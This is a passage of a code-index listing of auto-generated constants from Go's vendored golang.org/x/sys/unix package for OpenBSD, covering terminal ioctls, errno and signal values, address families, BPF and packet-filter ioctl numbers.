0x2000747a constant TIOCCDTR (line 1514) | TIOCCDTR = 0x20007478 constant TIOCCHKVERAUTH (line 1515) | TIOCCHKVERAUTH = 0x2000741e constant TIOCCLRVERAUTH (line 1516) | TIOCCLRVERAUTH = 0x2000741d constant TIOCCONS (line 1517) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1518) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1519) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1520) | TIOCEXT = 0x80047460 constant TIOCFLAG_CLOCAL (line 1521) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1522) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1523) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_PPS (line 1524) | TIOCFLAG_PPS = 0x10 constant TIOCFLAG_SOFTCAR (line 1525) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1526) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1527) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1528) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1529) | TIOCGFLAGS = 0x4004745d constant TIOCGPGRP (line 1530) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1531) | TIOCGSID = 0x40047463 constant TIOCGTSTAMP (line 1532) | TIOCGTSTAMP = 0x4010745b constant TIOCGWINSZ (line 1533) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1534) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1535) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1536) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1537) | TIOCMODG = 0x4004746a constant TIOCMODS (line 1538) | TIOCMODS = 0x8004746d constant TIOCMSET (line 1539) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1540) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1541) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1542) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1543) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1544) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1545) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1546) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1547) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1548) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1549) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1550) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1551) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1552) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1553) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1554) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1555) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1556) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1557) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1558) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1559) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1560) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1561) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1562) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1563) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1564) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1565) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1566) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1567) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1568) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1569) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1570) | TIOCSETD = 0x8004741b constant TIOCSETVERAUTH (line 1571) | TIOCSETVERAUTH = 0x8004741c constant TIOCSFLAGS (line 1572) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1573) | TIOCSIG = 0x8004745f constant TIOCSPGRP (line 1574) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1575) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1576) | TIOCSTAT = 0x20007465 constant TIOCSTOP (line 1577) | TIOCSTOP = 0x2000746f constant TIOCSTSTAMP (line 1578) | TIOCSTSTAMP = 0x8008745a constant TIOCSWINSZ (line 1579) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1580) | TIOCUCNTL = 0x80047466 constant TIOCUCNTL_CBRK (line 1581) | TIOCUCNTL_CBRK = 0x7a constant TIOCUCNTL_SBRK (line 1582) | TIOCUCNTL_SBRK = 0x7b constant TOSTOP (line 1583) | TOSTOP = 0x400000 constant UTIME_NOW (line 1584) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1585) | UTIME_OMIT = -0x1 constant VDISCARD (line 1586) | VDISCARD = 0xf constant VDSUSP (line 1587) | VDSUSP = 0xb constant VEOF (line 1588) | VEOF = 0x0 constant VEOL (line 1589) | VEOL = 0x1 constant VEOL2 (line 1590) | VEOL2 = 0x2 constant VERASE (line 1591) | VERASE = 0x3 constant VINTR (line 1592) | VINTR = 0x8 constant VKILL (line 1593) | VKILL = 0x5 constant VLNEXT (line 1594) | VLNEXT = 0xe constant VMIN (line 1595) | VMIN = 0x10 constant VM_ANONMIN (line 1596) | VM_ANONMIN = 0x7 constant VM_LOADAVG (line 1597) | VM_LOADAVG = 0x2 constant VM_MALLOC_CONF (line 1598) | VM_MALLOC_CONF = 0xc constant VM_MAXID (line 1599) | VM_MAXID = 0xd constant VM_MAXSLP (line 1600) | VM_MAXSLP = 0xa constant VM_METER (line 1601) | VM_METER = 0x1 constant VM_NKMEMPAGES (line 1602) | VM_NKMEMPAGES = 0x6 constant VM_PSSTRINGS (line 1603) | VM_PSSTRINGS = 0x3 constant VM_SWAPENCRYPT (line 1604) | VM_SWAPENCRYPT = 0x5 constant VM_USPACE (line 1605) | VM_USPACE = 0xb constant VM_UVMEXP (line 1606) | VM_UVMEXP = 0x4 constant VM_VNODEMIN (line 1607) | VM_VNODEMIN = 0x9 constant VM_VTEXTMIN (line 1608) | VM_VTEXTMIN = 0x8 constant VQUIT (line 1609) | VQUIT = 0x9 constant VREPRINT (line 1610) | VREPRINT = 0x6 constant VSTART (line 1611) | VSTART = 0xc constant VSTATUS (line 1612) | VSTATUS = 0x12 constant VSTOP (line 1613) | VSTOP = 0xd constant VSUSP (line 1614) | VSUSP = 0xa constant VTIME (line 1615) | VTIME = 0x11 constant VWERASE (line 1616) | VWERASE = 0x4 constant WALTSIG (line 1617) | WALTSIG = 0x4 constant WCONTINUED (line 1618) | WCONTINUED = 0x8 constant WCOREFLAG (line 1619) | WCOREFLAG = 0x80 constant WNOHANG (line 1620) | WNOHANG = 0x1 constant WUNTRACED (line 1621) | WUNTRACED = 0x2 constant XCASE (line 1622) | XCASE = 0x1000000 constant E2BIG (line 1627) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1628) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1629) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1630) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1631) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1632) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1633) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1634) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1635) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1636) | EBADMSG = syscall.Errno(0x5c) constant EBADRPC (line 1637) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1638) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1639) | ECANCELED = syscall.Errno(0x58) constant ECHILD (line 1640) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1641) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1642) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1643) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1644) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1645) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1646) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1647) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1648) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1649) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1650) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1651) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1652) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1653) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1654) | EIDRM = syscall.Errno(0x59) constant EILSEQ (line 1655) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 1656) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1657) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1658) | EINVAL = syscall.Errno(0x16) constant EIO (line 1659) | EIO = syscall.Errno(0x5) constant EIPSEC (line 1660) | EIPSEC = syscall.Errno(0x52) constant EISCONN (line 1661) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1662) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1663) | ELAST = syscall.Errno(0x5f) constant ELOOP (line 1664) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 1665) | EMEDIUMTYPE = syscall.Errno(0x56) constant EMFILE (line 1666) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1667) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1668) | EMSGSIZE = syscall.Errno(0x28) constant ENAMETOOLONG (line 1669) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1670) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1671) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1672) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1673) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1674) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1675) | ENOATTR = syscall.Errno(0x53) constant ENOBUFS (line 1676) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1677) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1678) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1679) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1680) | ENOLCK = syscall.Errno(0x4d) constant ENOMEDIUM (line 1681) | ENOMEDIUM = syscall.Errno(0x55) constant ENOMEM (line 1682) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1683) | ENOMSG = syscall.Errno(0x5a) constant ENOPROTOOPT (line 1684) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1685) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1686) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1687) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1688) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1689) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1690) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1691) | ENOTRECOVERABLE = syscall.Errno(0x5d) constant ENOTSOCK (line 1692) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1693) | ENOTSUP = syscall.Errno(0x5b) constant ENOTTY (line 1694) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1695) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1696) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1697) | EOVERFLOW = syscall.Errno(0x57) constant EOWNERDEAD (line 1698) | EOWNERDEAD = syscall.Errno(0x5e) constant EPERM (line 1699) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1700) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1701) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1702) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1703) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1704) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1705) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1706) | EPROTO = syscall.Errno(0x5f) constant EPROTONOSUPPORT (line 1707) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1708) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1709) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1710) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1711) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1712) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1713) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1714) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1715) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1716) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1717) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1718) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1719) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1720) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1721) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1722) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1723) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1728) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1729) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1730) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1731) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1732) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1733) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1734) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1735) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1736) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1737) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1738) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1739) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1740) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1741) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1742) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1743) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1744) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1745) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1746) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1747) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1748) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1749) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1750) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1751) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1752) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1753) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1754) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1755) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1756) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1757) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1758) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1759) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1760) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_openbsd_arm.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BLUETOOTH (line 15) | AF_BLUETOOTH = 0x20 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_CNT (line 18) | AF_CNT = 0x15 constant AF_COIP (line 19) | AF_COIP = 0x14 constant AF_DATAKIT (line 20) | AF_DATAKIT = 0x9 constant AF_DECnet (line 21) | AF_DECnet = 0xc constant AF_DLI (line 22) | AF_DLI = 0xd constant AF_E164 (line 23) | AF_E164 = 0x1a constant AF_ECMA (line 24) | AF_ECMA = 0x8 constant AF_ENCAP (line 25) | AF_ENCAP = 0x1c constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IMPLINK (line 27) | AF_IMPLINK = 0x3 constant AF_INET (line 28) | AF_INET = 0x2 constant AF_INET6 (line 29) | AF_INET6 = 0x18 constant AF_IPX (line 30) | AF_IPX = 0x17 constant AF_ISDN (line 31) | AF_ISDN = 0x1a constant AF_ISO (line 32) | AF_ISO = 0x7 constant AF_KEY (line 33) | AF_KEY = 0x1e constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OSI (line 41) | AF_OSI = 0x7 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_ROUTE (line 43) | AF_ROUTE = 0x11 constant AF_SIP (line 44) | AF_SIP = 0x1d constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ALTWERASE (line 48) | ALTWERASE = 0x200 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant B0 (line 53) | B0 = 0x0 constant B110 (line 54) | B110 = 0x6e constant B115200 (line 55) | B115200 = 0x1c200 constant B1200 (line 56) | B1200 = 0x4b0 constant B134 (line 57) | B134 = 0x86 constant B14400 (line 58) | B14400 = 0x3840 constant B150 (line 59) | B150 = 0x96 constant B1800 (line 60) | B1800 = 0x708 constant B19200 (line 61) | B19200 = 0x4b00 constant B200 (line 62) | B200 = 0xc8 constant B230400 (line 63) | B230400 = 0x38400 constant B2400 (line 64) | B2400 = 0x960 constant B28800 (line 65) | B28800 = 0x7080 constant B300 (line 66) | B300 = 0x12c constant B38400 (line 67) | B38400 = 0x9600 constant B4800 (line 68) | B4800 = 0x12c0 constant B50 (line 69) | B50 = 0x32 constant B57600 (line 70) | B57600 = 0xe100 constant B600 (line 71) | B600 = 0x258 constant B7200 (line 72) | B7200 = 0x1c20 constant B75 (line 73) | B75 = 0x4b constant B76800 (line 74) | B76800 = 0x12c00 constant B9600 (line 75) | B9600 = 0x2580 constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDIRFILT (line 78) | BIOCGDIRFILT = 0x4004427c constant BIOCGDLT (line 79) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 80) | BIOCGDLTLIST = 0xc008427b constant BIOCGETIF (line 81) | BIOCGETIF = 0x4020426b constant BIOCGFILDROP (line 82) | BIOCGFILDROP = 0x40044278 constant BIOCGHDRCMPLT (line 83) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 84) | BIOCGRSIG = 0x40044273 constant BIOCGRTIMEOUT (line 85) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x20004276 constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRFILT (line 91) | BIOCSDIRFILT = 0x8004427d constant BIOCSDLT (line 92) | BIOCSDLT = 0x8004427a constant BIOCSETF (line 93) | BIOCSETF = 0x80084267 constant BIOCSETIF (line 94) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 95) | BIOCSETWF = 0x80084277 constant BIOCSFILDROP (line 96) | BIOCSFILDROP = 0x80044279 constant BIOCSHDRCMPLT (line 97) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 98) | BIOCSRSIG = 0x80044272 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010426d constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DIRECTION_IN (line 108) | BPF_DIRECTION_IN = 0x1 constant BPF_DIRECTION_OUT (line 109) | BPF_DIRECTION_OUT = 0x2 constant BPF_DIV (line 110) | BPF_DIV = 0x30 constant BPF_FILDROP_CAPTURE (line 111) | BPF_FILDROP_CAPTURE = 0x1 constant BPF_FILDROP_DROP (line 112) | BPF_FILDROP_DROP = 0x2 constant BPF_FILDROP_PASS (line 113) | BPF_FILDROP_PASS = 0x0 constant BPF_F_DIR_IN (line 114) | BPF_F_DIR_IN = 0x10 constant BPF_F_DIR_MASK (line 115) | BPF_F_DIR_MASK = 0x30 constant BPF_F_DIR_OUT (line 116) | BPF_F_DIR_OUT = 0x20 constant BPF_F_DIR_SHIFT (line 117) | BPF_F_DIR_SHIFT = 0x4 constant BPF_F_FLOWID (line 118) | BPF_F_FLOWID = 0x8 constant BPF_F_PRI_MASK (line 119) | BPF_F_PRI_MASK = 0x7 constant BPF_H (line 120) | BPF_H = 0x8 constant BPF_IMM (line 121) | BPF_IMM = 0x0 constant BPF_IND (line 122) | BPF_IND = 0x40 constant BPF_JA (line 123) | BPF_JA = 0x0 constant BPF_JEQ (line 124) | BPF_JEQ = 0x10 constant BPF_JGE (line 125) | BPF_JGE = 0x30 constant BPF_JGT (line 126) | BPF_JGT = 0x20 constant BPF_JMP (line 127) | BPF_JMP = 0x5 constant BPF_JSET (line 128) | BPF_JSET = 0x40 constant BPF_K (line 129) | BPF_K = 0x0 constant BPF_LD (line 130) | BPF_LD = 0x0 constant BPF_LDX (line 131) | BPF_LDX = 0x1 constant BPF_LEN (line 132) | BPF_LEN = 0x80 constant BPF_LSH (line 133) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 134) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 135) | BPF_MAXBUFSIZE = 0x200000 constant BPF_MAXINSNS (line 136) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 137) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 138) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 139) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 140) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 141) | BPF_MISC = 0x7 constant BPF_MSH (line 142) | BPF_MSH = 0xa0 constant BPF_MUL (line 143) | BPF_MUL = 0x20 constant BPF_NEG (line 144) | BPF_NEG = 0x80 constant BPF_OR (line 145) | BPF_OR = 0x40 constant BPF_RELEASE (line 146) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 147) | BPF_RET = 0x6 constant BPF_RND (line 148) | BPF_RND = 0xc0 constant BPF_RSH (line 149) | BPF_RSH = 0x70 constant BPF_ST (line 150) | BPF_ST = 0x2 constant BPF_STX (line 151) | BPF_STX = 0x3 constant BPF_SUB (line 152) | BPF_SUB = 0x10 constant BPF_TAX (line 153) | BPF_TAX = 0x0 constant BPF_TXA (line 154) | BPF_TXA = 0x80 constant BPF_W (line 155) | BPF_W = 0x0 constant BPF_X (line 156) | BPF_X = 0x8 constant BRKINT (line 157) | BRKINT = 0x2 constant CFLUSH (line 158) | CFLUSH = 0xf constant CLOCAL (line 159) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 160) | CLOCK_BOOTTIME = 0x6 constant CLOCK_MONOTONIC (line 161) | CLOCK_MONOTONIC = 0x3 constant CLOCK_PROCESS_CPUTIME_ID (line 162) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 163) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 164) | CLOCK_THREAD_CPUTIME_ID = 0x4 constant CLOCK_UPTIME (line 165) | CLOCK_UPTIME = 0x5 constant CPUSTATES (line 166) | CPUSTATES = 0x6 constant CP_IDLE (line 167) | CP_IDLE = 0x5 constant CP_INTR (line 168) | CP_INTR = 0x4 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SPIN (line 170) | CP_SPIN = 0x3 constant CP_SYS (line 171) | CP_SYS = 0x2 constant CP_USER (line 172) | CP_USER = 0x0 constant CREAD (line 173) | CREAD = 0x800 constant CRTSCTS (line 174) | CRTSCTS = 0x10000 constant CS5 (line 175) | CS5 = 0x0 constant CS6 (line 176) | CS6 = 0x100 constant CS7 (line 177) | CS7 = 0x200 constant CS8 (line 178) | CS8 = 0x300 constant CSIZE (line 179) | CSIZE = 0x300 constant CSTART (line 180) | CSTART = 0x11 constant CSTATUS (line 181) | CSTATUS = 0xff constant CSTOP (line 182) | CSTOP = 0x13 constant CSTOPB (line 183) | CSTOPB = 0x400 constant CSUSP (line 184) | CSUSP = 0x1a constant CTL_HW (line 185) | CTL_HW = 0x6 constant CTL_KERN (line 186) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 187) | CTL_MAXNAME = 0xc constant CTL_NET (line 188) | CTL_NET = 0x4 constant DIOCADDQUEUE (line 189) | DIOCADDQUEUE = 0xc100445d constant DIOCADDRULE (line 190) | DIOCADDRULE = 0xcce04404 constant DIOCADDSTATE (line 191) | DIOCADDSTATE = 0xc1084425 constant DIOCCHANGERULE (line 192) | DIOCCHANGERULE = 0xcce0441a constant DIOCCLRIFFLAG (line 193) | DIOCCLRIFFLAG = 0xc024445a constant DIOCCLRSRCNODES (line 194) | DIOCCLRSRCNODES = 0x20004455 constant DIOCCLRSTATES (line 195) | DIOCCLRSTATES = 0xc0d04412 constant DIOCCLRSTATUS (line 196) | DIOCCLRSTATUS = 0xc0244416 constant DIOCGETLIMIT (line 197) | DIOCGETLIMIT = 0xc0084427 constant DIOCGETQSTATS (line 198) | DIOCGETQSTATS = 0xc1084460 constant DIOCGETQUEUE (line 199) | DIOCGETQUEUE = 0xc100445f constant DIOCGETQUEUES (line 200) | DIOCGETQUEUES = 0xc100445e constant DIOCGETRULE (line 201) | DIOCGETRULE = 0xcce04407 constant DIOCGETRULES (line 202) | DIOCGETRULES = 0xcce04406 constant DIOCGETRULESET (line 203) | DIOCGETRULESET = 0xc444443b constant DIOCGETRULESETS (line 204) | DIOCGETRULESETS = 0xc444443a constant DIOCGETSRCNODES (line 205) | DIOCGETSRCNODES = 0xc0084454 constant DIOCGETSTATE (line 206) | DIOCGETSTATE = 0xc1084413 constant DIOCGETSTATES (line 207) | DIOCGETSTATES = 0xc0084419 constant DIOCGETSTATUS (line 208) | DIOCGETSTATUS = 0xc1e84415 constant DIOCGETSYNFLWATS (line 209) | DIOCGETSYNFLWATS = 0xc0084463 constant DIOCGETTIMEOUT (line 210) | DIOCGETTIMEOUT = 0xc008441e constant DIOCIGETIFACES (line 211) | DIOCIGETIFACES = 0xc0244457 constant DIOCKILLSRCNODES (line 212) | DIOCKILLSRCNODES = 0xc068445b constant DIOCKILLSTATES (line 213) | DIOCKILLSTATES = 0xc0d04429 constant DIOCNATLOOK (line 214) | DIOCNATLOOK = 0xc0504417 constant DIOCOSFPADD (line 215) | DIOCOSFPADD = 0xc088444f constant DIOCOSFPFLUSH (line 216) | DIOCOSFPFLUSH = 0x2000444e constant DIOCOSFPGET (line 217) | DIOCOSFPGET = 0xc0884450 constant DIOCRADDADDRS (line 218) | DIOCRADDADDRS = 0xc44c4443 constant DIOCRADDTABLES (line 219) | DIOCRADDTABLES = 0xc44c443d constant DIOCRCLRADDRS (line 220) | DIOCRCLRADDRS = 0xc44c4442 constant DIOCRCLRASTATS (line 221) | DIOCRCLRASTATS = 0xc44c4448 constant DIOCRCLRTABLES (line 222) | DIOCRCLRTABLES = 0xc44c443c constant DIOCRCLRTSTATS (line 223) | DIOCRCLRTSTATS = 0xc44c4441 constant DIOCRDELADDRS (line 224) | DIOCRDELADDRS = 0xc44c4444 constant DIOCRDELTABLES (line 225) | DIOCRDELTABLES = 0xc44c443e constant DIOCRGETADDRS (line 226) | DIOCRGETADDRS = 